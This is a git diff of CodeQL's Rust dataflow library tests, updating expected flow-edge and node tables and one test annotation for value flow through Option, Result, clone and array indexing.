-| main.rs:246:10:246:11 | s1 [Some] | main.rs:246:10:246:24 | s1.unwrap_or(...) | provenance | MaD:3 | | main.rs:249:23:249:32 | source(...) | main.rs:249:10:249:33 | s2.unwrap_or(...) | provenance | MaD:2 | -| main.rs:253:9:253:10 | s1 [Some] | main.rs:254:10:254:11 | s1 [Some] | provenance | | +| main.rs:253:9:253:10 | s1 [Some] | main.rs:254:10:254:32 | s1.unwrap_or_else(...) | provenance | MaD:5 | | main.rs:253:14:253:29 | Some(...) [Some] | main.rs:253:9:253:10 | s1 [Some] | provenance | | | main.rs:253:19:253:28 | source(...) | main.rs:253:14:253:29 | Some(...) [Some] | provenance | | -| main.rs:254:10:254:11 | s1 [Some] | main.rs:254:10:254:32 | s1.unwrap_or_else(...) | provenance | MaD:5 | | main.rs:257:31:257:40 | source(...) | main.rs:257:10:257:41 | s2.unwrap_or_else(...) | provenance | MaD:4 | | main.rs:261:9:261:10 | s1 [Some] | main.rs:263:14:263:15 | s1 [Some] | provenance | | | main.rs:261:14:261:29 | Some(...) [Some] | main.rs:261:9:261:10 | s1 [Some] | provenance | | @@ -103,14 +100,12 @@ edges | main.rs:273:9:273:10 | i1 | main.rs:275:10:275:11 | i1 | provenance | | | main.rs:273:14:273:15 | s1 [Ok] | main.rs:273:14:273:16 | TryExpr | provenance | | | main.rs:273:14:273:16 | TryExpr | main.rs:273:9:273:10 | i1 | provenance | | -| main.rs:283:9:283:10 | s1 [Ok] | main.rs:284:10:284:11 | s1 [Ok] | provenance | | +| main.rs:283:9:283:10 | s1 [Ok] | main.rs:284:10:284:22 | s1.expect(...) | provenance | MaD:6 | | main.rs:283:32:283:45 | Ok(...) [Ok] | main.rs:283:9:283:10 | s1 [Ok] | provenance | | | main.rs:283:35:283:44 | source(...) | main.rs:283:32:283:45 | Ok(...) [Ok] | provenance | | -| main.rs:284:10:284:11 | s1 [Ok] | main.rs:284:10:284:22 | s1.expect(...) | provenance | MaD:6 | -| main.rs:287:9:287:10 | s2 [Err] | main.rs:289:10:289:11 | s2 [Err] | provenance | | +| main.rs:287:9:287:10 | s2 [Err] | main.rs:289:10:289:26 | s2.expect_err(...) | provenance | MaD:7 | | main.rs:287:32:287:46 | Err(...) [Err] | main.rs:287:9:287:10 | s2 [Err] | provenance | | | main.rs:287:36:287:45 | source(...) | main.rs:287:32:287:46 | Err(...) [Err] | provenance | | -| main.rs:289:10:289:11 | s2 [Err] | main.rs:289:10:289:26 | s2.expect_err(...) | provenance | MaD:7 | | main.rs:298:9:298:10 | s1 [A] | main.rs:300:11:300:12 | s1 [A] | provenance | | | main.rs:298:14:298:39 | ...::A(...) [A] | main.rs:298:9:298:10 | s1 [A] | provenance | | | main.rs:298:29:298:38 | source(...) | main.rs:298:14:298:39 | ...::A(...) [A] | provenance | | @@ -196,6 +191,10 @@ edges | main.rs:467:10:467:11 | vs [element] | main.rs:467:10:467:14 | vs[0] | provenance | | | main.rs:471:9:471:9 | v | main.rs:472:14:472:14 | v | provenance | | | main.rs:471:14:471:15 | vs [element] | main.rs:471:9:471:9 | v | provenance | | +| main.rs:490:9:490:18 | mut vs_mut [element] | main.rs:492:10:492:15 | vs_mut [element] | provenance | | +| main.rs:490:22:490:42 | [...] [element] | main.rs:490:9:490:18 | mut vs_mut [element] | provenance | | +| main.rs:490:23:490:32 | source(...) | main.rs:490:22:490:42 | [...] [element] | provenance | | +| main.rs:492:10:492:15 | vs_mut [element] | main.rs:492:10:492:18 | vs_mut[0] | provenance | | | main.rs:502:9:502:9 | a | main.rs:507:10:507:10 | a | provenance | | | main.rs:502:13:502:22 | source(...) | main.rs:502:9:502:9 | a | provenance | | | main.rs:504:9:504:9 | c | main.rs:505:18:505:18 | c | provenance | | @@ -294,19 +293,16 @@ nodes | main.rs:240:9:240:10 | s1 [Some] | semmle.label | s1 [Some] | | main.rs:240:14:240:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:240:19:240:28 | source(...) | semmle.label | source(...) | -| main.rs:241:10:241:11 | s1 [Some] | semmle.label | s1 [Some] | | main.rs:241:10:241:20 | s1.unwrap(...) | semmle.label | s1.unwrap(...) | | main.rs:245:9:245:10 | s1 [Some] | semmle.label | s1 [Some] | | main.rs:245:14:245:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:245:19:245:28 | source(...) | semmle.label | source(...) | -| main.rs:246:10:246:11 | s1 [Some] | semmle.label | s1 [Some] | | main.rs:246:10:246:24 | s1.unwrap_or(...) | semmle.label | s1.unwrap_or(...) | | main.rs:249:10:249:33 | s2.unwrap_or(...) | semmle.label | s2.unwrap_or(...) | | main.rs:249:23:249:32 | source(...) | semmle.label | source(...) | | main.rs:253:9:253:10 | s1 [Some] | semmle.label | s1 [Some] | | main.rs:253:14:253:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:253:19:253:28 | source(...) | semmle.label | source(...) | -| main.rs:254:10:254:11 | s1 [Some] | semmle.label | s1 [Some] | | main.rs:254:10:254:32 | s1.unwrap_or_else(...) | semmle.label | s1.unwrap_or_else(...) | | main.rs:257:10:257:41 | s2.unwrap_or_else(...) | semmle.label | s2.unwrap_or_else(...) | | main.rs:257:31:257:40 | source(...) | semmle.label | source(...) | @@ -327,12 +323,10 @@ nodes | main.rs:283:9:283:10 | s1 [Ok] | semmle.label | s1 [Ok] | | main.rs:283:32:283:45 | Ok(...) [Ok] | semmle.label | Ok(...) [Ok] | | main.rs:283:35:283:44 | source(...) | semmle.label | source(...) | -| main.rs:284:10:284:11 | s1 [Ok] | semmle.label | s1 [Ok] | | main.rs:284:10:284:22 | s1.expect(...) | semmle.label | s1.expect(...) | | main.rs:287:9:287:10 | s2 [Err] | semmle.label | s2 [Err] | | main.rs:287:32:287:46 | Err(...) [Err] | semmle.label | Err(...) [Err] | | main.rs:287:36:287:45 | source(...) | semmle.label | source(...) | -| main.rs:289:10:289:11 | s2 [Err] | semmle.label | s2 [Err] | | main.rs:289:10:289:26 | s2.expect_err(...) | semmle.label | s2.expect_err(...) | | main.rs:298:9:298:10 | s1 [A] | semmle.label | s1 [A] | | main.rs:298:14:298:39 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | @@ -431,6 +425,11 @@ nodes | main.rs:471:9:471:9 | v | semmle.label | v | | main.rs:471:14:471:15 | vs [element] | semmle.label | vs [element] | | main.rs:472:14:472:14 | v | semmle.label | v | +| main.rs:490:9:490:18 | mut vs_mut [element] | semmle.label | mut vs_mut [element] | +| main.rs:490:22:490:42 | [...] [element] | semmle.label | [...] [element] | +| main.rs:490:23:490:32 | source(...) | semmle.label | source(...) | +| main.rs:492:10:492:15 | vs_mut [element] | semmle.label | vs_mut [element] | +| main.rs:492:10:492:18 | vs_mut[0] | semmle.label | vs_mut[0] | | main.rs:502:9:502:9 | a | semmle.label | a | | main.rs:502:13:502:22 | source(...) | semmle.label | source(...) | | main.rs:504:9:504:9 | c | semmle.label | c | @@ -489,5 +488,6 @@ testFailures | main.rs:458:10:458:10 | a | main.rs:453:13:453:22 | source(...) | main.rs:458:10:458:10 | a | $@ | main.rs:453:13:453:22 | source(...) | source(...) | | main.rs:467:10:467:14 | vs[0] | main.rs:465:15:465:24 | source(...) | main.rs:467:10:467:14 | vs[0] | $@ | main.rs:465:15:465:24 | source(...) | source(...) | | main.rs:472:14:472:14 | v | main.rs:465:15:465:24 | source(...) | main.rs:472:14:472:14 | v | $@ | main.rs:465:15:465:24 | source(...) | source(...) | +| main.rs:492:10:492:18 | vs_mut[0] | main.rs:490:23:490:32 | source(...) | main.rs:492:10:492:18 | vs_mut[0] | $@ | main.rs:490:23:490:32 | source(...) | source(...) | | main.rs:507:10:507:10 | a | main.rs:502:13:502:22 | source(...) | main.rs:507:10:507:10 | a | $@ | main.rs:502:13:502:22 | source(...) | source(...) | | main.rs:510:10:510:15 | * ... | main.rs:504:13:504:22 | source(...) | main.rs:510:10:510:15 | * ... | $@ | main.rs:504:13:504:22 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/local/main.rs b/rust/ql/test/library-tests/dataflow/local/main.rs index 33872fa8e720..38aed12ab21b 100644 --- a/rust/ql/test/library-tests/dataflow/local/main.rs +++ b/rust/ql/test/library-tests/dataflow/local/main.rs @@ -489,7 +489,7 @@ fn iterators() { let mut vs_mut = [source(92), 2, 3, 4]; - sink(vs_mut[0]); // $ MISSING: hasValueFlow=92 + sink(vs_mut[0]); // $ hasValueFlow=92 sink(*vs_mut.iter().next().unwrap()); // $ MISSING: hasValueFlow=92 sink(*vs_mut.iter().nth(0).unwrap()); // $ MISSING: hasValueFlow=92 diff --git a/rust/ql/test/library-tests/dataflow/modeled/inline-flow.expected b/rust/ql/test/library-tests/dataflow/modeled/inline-flow.expected index a0a64c0a7a52..67ddd325b458 100644 --- a/rust/ql/test/library-tests/dataflow/modeled/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/modeled/inline-flow.expected @@ -5,41 +5,33 @@ models | 4 | Summary: lang:core; ::clone; Argument[self].Field[crate::result::Result::Ok(0)]; ReturnValue.Field[crate::result::Result::Ok(0)]; value | | 5 | Summary: lang:core; ::unwrap; Argument[self].Field[crate::result::Result::Ok(0)]; ReturnValue; value | edges -| main.rs:13:9:13:9 | a [Some] | main.rs:14:10:14:10 | a [Some] | provenance | | -| main.rs:13:9:13:9 | a [Some] | main.rs:15:13:15:13 | a [Some] | provenance | | +| main.rs:13:9:13:9 | a [Some] | main.rs:14:10:14:19 | a.unwrap(...) | provenance | MaD:2 | +| main.rs:13:9:13:9 | a [Some] | main.rs:15:13:15:21 | a.clone(...) [Some] | provenance | MaD:1 | +| main.rs:13:9:13:9 | a [Some] | main.rs:15:13:15:21 | a.clone(...) [Some] | provenance | generated | | main.rs:13:13:13:28 | Some(...) [Some] | main.rs:13:9:13:9 | a [Some] | provenance | | | main.rs:13:18:13:27 | source(...) | main.rs:13:13:13:28 | Some(...) [Some] | provenance | | -| main.rs:14:10:14:10 | a [Some] | main.rs:14:10:14:19 | a.unwrap(...) | provenance | MaD:2 | -| main.rs:15:9:15:9 | b [Some] | main.rs:16:10:16:10 | b [Some] | provenance | | -| main.rs:15:13:15:13 | a [Some] | main.rs:15:13:15:21 | a.clone(...) [Some] | provenance | MaD:1 | -| main.rs:15:13:15:13 | a [Some] | main.rs:15:13:15:21 | a.clone(...) [Some] | provenance | generated | +| main.rs:15:9:15:9 | b [Some] | main.rs:16:10:16:19 | b.unwrap(...) | provenance | MaD:2 | | main.rs:15:13:15:21 | a.clone(...) [Some] | main.rs:15:9:15:9 | b [Some] | provenance | | -| main.rs:16:10:16:10 | b [Some] | main.rs:16:10:16:19 | b.unwrap(...) | provenance | MaD:2 | -| main.rs:20:9:20:9 | a [Ok] | main.rs:21:10:21:10 | a [Ok] | provenance | | -| main.rs:20:9:20:9 | a [Ok] | main.rs:22:13:22:13 | a [Ok] | provenance | | +| main.rs:20:9:20:9 | a [Ok] | main.rs:21:10:21:19 | a.unwrap(...) | provenance | MaD:5 | +| main.rs:20:9:20:9 | a [Ok] | main.rs:22:13:22:21 | a.clone(...) [Ok] | provenance | MaD:4 | +| main.rs:20:9:20:9 | a [Ok] | main.rs:22:13:22:21 | a.clone(...) [Ok] | provenance | generated | | main.rs:20:31:20:44 | Ok(...) [Ok] | main.rs:20:9:20:9 | a [Ok] | provenance | | | main.rs:20:34:20:43 | source(...) | main.rs:20:31:20:44 | Ok(...) [Ok] | provenance | | -| main.rs:21:10:21:10 | a [Ok] | main.rs:21:10:21:19 | a.unwrap(...) | provenance | MaD:5 | -| main.rs:22:9:22:9 | b [Ok] | main.rs:23:10:23:10 | b [Ok] | provenance | | -| main.rs:22:13:22:13 | a [Ok] | main.rs:22:13:22:21 | a.clone(...) [Ok] | provenance | MaD:4 | -| main.rs:22:13:22:13 | a [Ok] | main.rs:22:13:22:21 | a.clone(...) [Ok] | provenance | generated | +| main.rs:22:9:22:9 | b [Ok] | main.rs:23:10:23:19 | b.unwrap(...) | provenance | MaD:5 | | main.rs:22:13:22:21 | a.clone(...) [Ok] | main.rs:22:9:22:9 | b [Ok] | provenance | | -| main.rs:23:10:23:10 | b [Ok] | main.rs:23:10:23:19 | b.unwrap(...) | provenance | MaD:5 | | main.rs:27:9:27:9 | a | main.rs:28:10:28:10 | a | provenance | | -| main.rs:27:9:27:9 | a | main.rs:29:13:29:13 | a | provenance | | +| main.rs:27:9:27:9 | a | main.rs:29:13:29:21 | a.clone(...) | provenance | generated | | main.rs:27:13:27:22 | source(...) | main.rs:27:9:27:9 | a | provenance | | | main.rs:29:9:29:9 | b | main.rs:30:10:30:10 | b | provenance | | -| main.rs:29:13:29:13 | a | main.rs:29:13:29:21 | a.clone(...) | provenance | generated | | main.rs:29:13:29:21 | a.clone(...) | main.rs:29:9:29:9 | b | provenance | | | main.rs:42:13:42:13 | w [Wrapper] | main.rs:43:15:43:15 | w [Wrapper] | provenance | | | main.rs:42:17:42:41 | Wrapper {...} [Wrapper] | main.rs:42:13:42:13 | w [Wrapper] | provenance | | | main.rs:42:30:42:39 | source(...) | main.rs:42:17:42:41 | Wrapper {...} [Wrapper] | provenance | | | main.rs:43:15:43:15 | w [Wrapper] | main.rs:44:13:44:28 | Wrapper {...} [Wrapper] | provenance | | -| main.rs:43:15:43:15 | w [Wrapper] | main.rs:46:17:46:17 | w [Wrapper] | provenance | | +| main.rs:43:15:43:15 | w [Wrapper] | main.rs:46:17:46:25 | w.clone(...) [Wrapper] | provenance | generated | | main.rs:44:13:44:28 | Wrapper {...} [Wrapper] | main.rs:44:26:44:26 | n | provenance | | | main.rs:44:26:44:26 | n | main.rs:44:38:44:38 | n | provenance | | | main.rs:46:13:46:13 | u [Wrapper] | main.rs:47:15:47:15 | u [Wrapper] | provenance | | -| main.rs:46:17:46:17 | w [Wrapper] | main.rs:46:17:46:25 | w.clone(...) [Wrapper] | provenance | generated | | main.rs:46:17:46:25 | w.clone(...) [Wrapper] | main.rs:46:13:46:13 | u [Wrapper] | provenance | | | main.rs:47:15:47:15 | u [Wrapper] | main.rs:48:13:48:28 | Wrapper {...} [Wrapper] | provenance | | | main.rs:48:13:48:28 | Wrapper {...} [Wrapper] | main.rs:48:26:48:26 | n | provenance | | @@ -58,28 +50,21 @@ nodes | main.rs:13:9:13:9 | a [Some] | semmle.label | a [Some] | | main.rs:13:13:13:28 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:13:18:13:27 | source(...) | semmle.label | source(...) | -| main.rs:14:10:14:10 | a [Some] | semmle.label | a [Some] | | main.rs:14:10:14:19 | a.unwrap(...) | semmle.label | a.unwrap(...) | | main.rs:15:9:15:9 | b [Some] | semmle.label | b [Some] | -| main.rs:15:13:15:13 | a [Some] | semmle.label | a [Some] | | main.rs:15:13:15:21 | a.clone(...) [Some] | semmle.label | a.clone(...) [Some] | -| main.rs:16:10:16:10 | b [Some] | semmle.label | b [Some] | | main.rs:16:10:16:19 | b.unwrap(...) | semmle.label | b.unwrap(...) | | main.rs:20:9:20:9 | a [Ok] | semmle.label | a [Ok] | | main.rs:20:31:20:44 | Ok(...) [Ok] | semmle.label | Ok(...) [Ok] | | main.rs:20:34:20:43 | source(...) | semmle.label | source(...) | -| main.rs:21:10:21:10 | a [Ok] | semmle.label | a [Ok] | | main.rs:21:10:21:19 | a.unwrap(...) | semmle.label | a.unwrap(...) | | main.rs:22:9:22:9 | b [Ok] | semmle.label | b [Ok] | -| main.rs:22:13:22:13 | a [Ok] | semmle.label | a [Ok] | | main.rs:22:13:22:21 | a.clone(...) [Ok] | semmle.label | a.clone(...) [Ok] | -| main.rs:23:10:23:10 | b [Ok] | semmle.label | b [Ok] | | main.rs:23:10:23:19 | b.unwrap(...) | semmle.label | b.unwrap(...) | | main.rs:27:9:27:9 | a | semmle.label | a | | main.rs:27:13:27:22 | source(...) | semmle.label | source(...) | | main.rs:28:10:28:10 | a | semmle.label | a | | main.rs:29:9:29:9 | b | semmle.label | b | -| main.rs:29:13:29:13 | a | semmle.label | a | | main.rs:29:13:29:21 | a.clone(...) | semmle.label | a.clone(...) | | main.rs:30:10:30:10 | b | semmle.label | b | | main.rs:42:13:42:13 | w [Wrapper] | semmle.label | w [Wrapper] | @@ -90,7 +75,6 @@ nodes | main.rs:44:26:44:26 | n | semmle.label | n | | main.rs:44:38:44:38 | n | semmle.label | n | | main.rs:46:13:46:13 | u [Wrapper] | semmle.label | u [Wrapper] | -| main.rs:46:17:46:17 | w [Wrapper] | semmle.label | w [Wrapper] | | main.rs:46:17:46:25 | w.clone(...) [Wrapper] | semmle.label | w.clone(...) [Wrapper] | | main.rs:47:15:47:15 | u [Wrapper] | semmle.label | u [Wrapper] | | main.rs:48:13:48:28 | Wrapper {...} [Wrapper] | semmle.label | Wrapper {...} [Wrapper] | diff --git a/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected b/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected index 97d5a62618db..3ed7b7502562 100644 --- a/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected @@ -40,6 +40,11 @@ edges | main.rs:73:10:73:10 | [post] b [&ref] | main.rs:74:15:74:15 | b [&ref] | provenance | | | main.rs:73:14:73:23 | source(...) | main.rs:73:10:73:10 | [post] b [&ref] | provenance | | | main.rs:74:15:74:15 | b [&ref] | main.rs:74:14:74:15 | * ... | provenance | | +| main.rs:90:11:90:16 | [post] &mut a [&ref] | main.rs:90:16:90:16 | [post] a | provenance | | +| main.rs:90:16:90:16 | [post] a | main.rs:91:14:91:14 | a | provenance | | +| main.rs:90:21:90:30 | source(...) | main.rs:90:11:90:16 | [post] &mut a [&ref] | provenance | | +| main.rs:95:13:95:29 | mut to_be_cleared | main.rs:98:14:98:26 | to_be_cleared | provenance | | +| main.rs:95:33:95:42 | source(...) | main.rs:95:13:95:29 | mut to_be_cleared | provenance | | | main.rs:105:10:105:10 | [post] c [&ref] | main.rs:106:15:106:15 | c [&ref] | provenance | | | main.rs:105:14:105:23 | source(...) | main.rs:105:10:105:10 | [post] c [&ref] | provenance | | | main.rs:106:15:106:15 | c [&ref] | main.rs:106:14:106:15 | * ... | provenance | | @@ -47,6 +52,10 @@ edges | main.rs:112:21:112:21 | a [&ref] | main.rs:113:15:113:15 | a [&ref] | provenance | | | main.rs:112:25:112:34 | source(...) | main.rs:112:13:112:21 | ref mut a | provenance | | | main.rs:113:15:113:15 | a [&ref] | main.rs:113:14:113:15 | * ... | provenance | | +| main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:150:11:150:11 | m [MyNumber] | provenance | | +| main.rs:150:11:150:11 | m [MyNumber] | main.rs:151:9:151:34 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:151:9:151:34 | ...::MyNumber(...) [MyNumber] | main.rs:151:28:151:33 | number | provenance | | +| main.rs:151:28:151:33 | number | main.rs:149:34:153:1 | { ... } | provenance | | | main.rs:156:18:156:21 | SelfParam [MyNumber] | main.rs:157:15:157:18 | self [MyNumber] | provenance | | | main.rs:157:15:157:18 | self [MyNumber] | main.rs:158:13:158:38 | ...::MyNumber(...) [MyNumber] | provenance | | | main.rs:158:13:158:38 | ...::MyNumber(...) [MyNumber] | main.rs:158:32:158:37 | number | provenance | | @@ -56,17 +65,27 @@ edges | main.rs:164:13:164:39 | &... [&ref, MyNumber] | main.rs:164:14:164:39 | ...::MyNumber(...) [MyNumber] | provenance | | | main.rs:164:14:164:39 | ...::MyNumber(...) [MyNumber] | main.rs:164:33:164:38 | number | provenance | | | main.rs:164:33:164:38 | number | main.rs:162:26:166:5 | { ... } | provenance | | -| main.rs:174:13:174:21 | my_number [MyNumber] | main.rs:175:14:175:22 | my_number [MyNumber] | provenance | | +| main.rs:174:13:174:21 | my_number [MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | provenance | | +| main.rs:174:13:174:21 | my_number [MyNumber] | main.rs:175:14:175:34 | my_number.to_number(...) | provenance | | | main.rs:174:25:174:54 | ...::MyNumber(...) [MyNumber] | main.rs:174:13:174:21 | my_number [MyNumber] | provenance | | | main.rs:174:44:174:53 | source(...) | main.rs:174:25:174:54 | ...::MyNumber(...) [MyNumber] | provenance | | -| main.rs:175:14:175:22 | my_number [MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | provenance | | -| main.rs:175:14:175:22 | my_number [MyNumber] | main.rs:175:14:175:34 | my_number.to_number(...) | provenance | | | main.rs:179:13:179:21 | my_number [MyNumber] | main.rs:180:16:180:24 | my_number [MyNumber] | provenance | | | main.rs:179:25:179:54 | ...::MyNumber(...) [MyNumber] | main.rs:179:13:179:21 | my_number [MyNumber] | provenance | | | main.rs:179:44:179:53 | source(...) | main.rs:179:25:179:54 | ...::MyNumber(...) [MyNumber] | provenance | | | main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | provenance | | | main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | main.rs:180:14:180:31 | ... .get(...) | provenance | | | main.rs:180:16:180:24 | my_number [MyNumber] | main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | provenance | | +| main.rs:184:13:184:21 | my_number [MyNumber] | main.rs:186:14:186:22 | my_number [MyNumber] | provenance | | +| main.rs:184:25:184:54 | ...::MyNumber(...) [MyNumber] | main.rs:184:13:184:21 | my_number [MyNumber] | provenance | | +| main.rs:184:44:184:53 | source(...) | main.rs:184:25:184:54 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:186:14:186:22 | my_number [MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | provenance | | +| main.rs:186:14:186:22 | my_number [MyNumber] | main.rs:186:14:186:28 | my_number.get(...) | provenance | | +| main.rs:190:13:190:21 | my_number [&ref, MyNumber] | main.rs:192:14:192:22 | my_number [&ref, MyNumber] | provenance | | +| main.rs:190:25:190:55 | &... [&ref, MyNumber] | main.rs:190:13:190:21 | my_number [&ref, MyNumber] | provenance | | +| main.rs:190:26:190:55 | ...::MyNumber(...) [MyNumber] | main.rs:190:25:190:55 | &... [&ref, MyNumber] | provenance | | +| main.rs:190:45:190:54 | source(...) | main.rs:190:26:190:55 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:192:14:192:22 | my_number [&ref, MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | provenance | | +| main.rs:192:14:192:22 | my_number [&ref, MyNumber] | main.rs:192:14:192:34 | my_number.to_number(...) | provenance | | | main.rs:200:29:200:38 | ...: i64 | main.rs:201:14:201:18 | value | provenance | | | main.rs:201:10:201:10 | [post] n [&ref] | main.rs:200:16:200:26 | ...: ... [Return] [&ref] | provenance | | | main.rs:201:14:201:18 | value | main.rs:201:10:201:10 | [post] n [&ref] | provenance | | @@ -74,6 +93,44 @@ edges | main.rs:210:20:210:29 | source(...) | main.rs:200:29:200:38 | ...: i64 | provenance | | | main.rs:210:20:210:29 | source(...) | main.rs:210:17:210:17 | [post] p [&ref] | provenance | | | main.rs:211:15:211:15 | p [&ref] | main.rs:211:14:211:15 | * ... | provenance | | +| main.rs:218:17:218:22 | [post] &mut n [&ref] | main.rs:218:22:218:22 | [post] n | provenance | | +| main.rs:218:22:218:22 | [post] n | main.rs:219:14:219:14 | n | provenance | | +| main.rs:218:25:218:34 | source(...) | main.rs:200:29:200:38 | ...: i64 | provenance | | +| main.rs:218:25:218:34 | source(...) | main.rs:218:17:218:22 | [post] &mut n [&ref] | provenance | | +| main.rs:223:27:223:37 | ...: i64 | main.rs:224:40:224:45 | number | provenance | | +| main.rs:224:14:224:17 | [post] self [&ref, MyNumber] | main.rs:223:16:223:24 | SelfParam [Return] [&ref, MyNumber] | provenance | | +| main.rs:224:21:224:46 | ...::MyNumber(...) [MyNumber] | main.rs:224:14:224:17 | [post] self [&ref, MyNumber] | provenance | | +| main.rs:224:40:224:45 | number | main.rs:224:21:224:46 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:228:37:228:47 | ...: i64 | main.rs:229:33:229:38 | number | provenance | | +| main.rs:229:10:229:10 | [post] n [&ref, MyNumber] | main.rs:228:19:228:34 | ...: ... [Return] [&ref, MyNumber] | provenance | | +| main.rs:229:14:229:39 | ...::MyNumber(...) [MyNumber] | main.rs:229:10:229:10 | [post] n [&ref, MyNumber] | provenance | | +| main.rs:229:33:229:38 | number | main.rs:229:14:229:39 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:234:20:234:33 | [post] &mut my_number [&ref, MyNumber] | main.rs:234:25:234:33 | [post] my_number [MyNumber] | provenance | | +| main.rs:234:25:234:33 | [post] my_number [MyNumber] | main.rs:235:14:235:22 | my_number [MyNumber] | provenance | | +| main.rs:234:25:234:33 | [post] my_number [MyNumber] | main.rs:237:14:237:22 | my_number [MyNumber] | provenance | | +| main.rs:234:36:234:45 | source(...) | main.rs:228:37:228:47 | ...: i64 | provenance | | +| main.rs:234:36:234:45 | source(...) | main.rs:234:20:234:33 | [post] &mut my_number [&ref, MyNumber] | provenance | | +| main.rs:235:14:235:22 | my_number [MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | provenance | | +| main.rs:235:14:235:22 | my_number [MyNumber] | main.rs:235:14:235:28 | my_number.get(...) | provenance | | +| main.rs:237:14:237:22 | my_number [MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | provenance | | +| main.rs:237:14:237:22 | my_number [MyNumber] | main.rs:237:14:237:28 | my_number.get(...) | provenance | | +| main.rs:243:9:243:17 | [post] my_number [MyNumber] | main.rs:244:24:244:32 | my_number [MyNumber] | provenance | | +| main.rs:243:9:243:17 | [post] my_number [MyNumber] | main.rs:246:24:246:32 | my_number [MyNumber] | provenance | | +| main.rs:243:23:243:32 | source(...) | main.rs:223:27:223:37 | ...: i64 | provenance | | +| main.rs:243:23:243:32 | source(...) | main.rs:243:9:243:17 | [post] my_number [MyNumber] | provenance | | +| main.rs:244:24:244:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | provenance | | +| main.rs:244:24:244:32 | my_number [MyNumber] | main.rs:244:14:244:33 | to_number(...) | provenance | | +| main.rs:246:24:246:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | provenance | | +| main.rs:246:24:246:32 | my_number [MyNumber] | main.rs:246:14:246:33 | to_number(...) | provenance | | +| main.rs:252:10:252:23 | [post] &mut my_number [&ref, MyNumber] | main.rs:252:15:252:23 | [post] my_number [MyNumber] | provenance | | +| main.rs:252:15:252:23 | [post] my_number [MyNumber] | main.rs:253:24:253:32 | my_number [MyNumber] | provenance | | +| main.rs:252:15:252:23 | [post] my_number [MyNumber] | main.rs:255:24:255:32 | my_number [MyNumber] | provenance | | +| main.rs:252:30:252:39 | source(...) | main.rs:223:27:223:37 | ...: i64 | provenance | | +| main.rs:252:30:252:39 | source(...) | main.rs:252:10:252:23 | [post] &mut my_number [&ref, MyNumber] | provenance | | +| main.rs:253:24:253:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | provenance | | +| main.rs:253:24:253:32 | my_number [MyNumber] | main.rs:253:14:253:33 | to_number(...) | provenance | | +| main.rs:255:24:255:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | provenance | | +| main.rs:255:24:255:32 | my_number [MyNumber] | main.rs:255:14:255:33 | to_number(...) | provenance | | nodes | main.rs:17:13:17:13 | a | semmle.label | a | | main.rs:17:17:17:26 | source(...) | semmle.label | source(...) | @@ -121,6 +178,13 @@ nodes | main.rs:73:14:73:23 | source(...) | semmle.label | source(...) | | main.rs:74:14:74:15 | * ... | semmle.label | * ... | | main.rs:74:15:74:15 | b [&ref] | semmle.label | b [&ref] | +| main.rs:90:11:90:16 | [post] &mut a [&ref] | semmle.label | [post] &mut a [&ref] | +| main.rs:90:16:90:16 | [post] a | semmle.label | [post] a | +| main.rs:90:21:90:30 | source(...) | semmle.label | source(...) | +| main.rs:91:14:91:14 | a | semmle.label | a | +| main.rs:95:13:95:29 | mut to_be_cleared | semmle.label | mut to_be_cleared | +| main.rs:95:33:95:42 | source(...) | semmle.label | source(...) | +| main.rs:98:14:98:26 | to_be_cleared | semmle.label | to_be_cleared | | main.rs:105:10:105:10 | [post] c [&ref] | semmle.label | [post] c [&ref] | | main.rs:105:14:105:23 | source(...) | semmle.label | source(...) | | main.rs:106:14:106:15 | * ... | semmle.label | * ... | @@ -130,6 +194,11 @@ nodes | main.rs:112:25:112:34 | source(...) | semmle.label | source(...) | | main.rs:113:14:113:15 | * ... | semmle.label | * ... | | main.rs:113:15:113:15 | a [&ref] | semmle.label | a [&ref] | +| main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | semmle.label | ...: MyNumber [MyNumber] | +| main.rs:149:34:153:1 | { ... } | semmle.label | { ... } | +| main.rs:150:11:150:11 | m [MyNumber] | semmle.label | m [MyNumber] | +| main.rs:151:9:151:34 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:151:28:151:33 | number | semmle.label | number | | main.rs:156:18:156:21 | SelfParam [MyNumber] | semmle.label | SelfParam [MyNumber] | | main.rs:156:31:160:5 | { ... } | semmle.label | { ... } | | main.rs:157:15:157:18 | self [MyNumber] | semmle.label | self [MyNumber] | @@ -144,7 +213,6 @@ nodes | main.rs:174:13:174:21 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | | main.rs:174:25:174:54 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | | main.rs:174:44:174:53 | source(...) | semmle.label | source(...) | -| 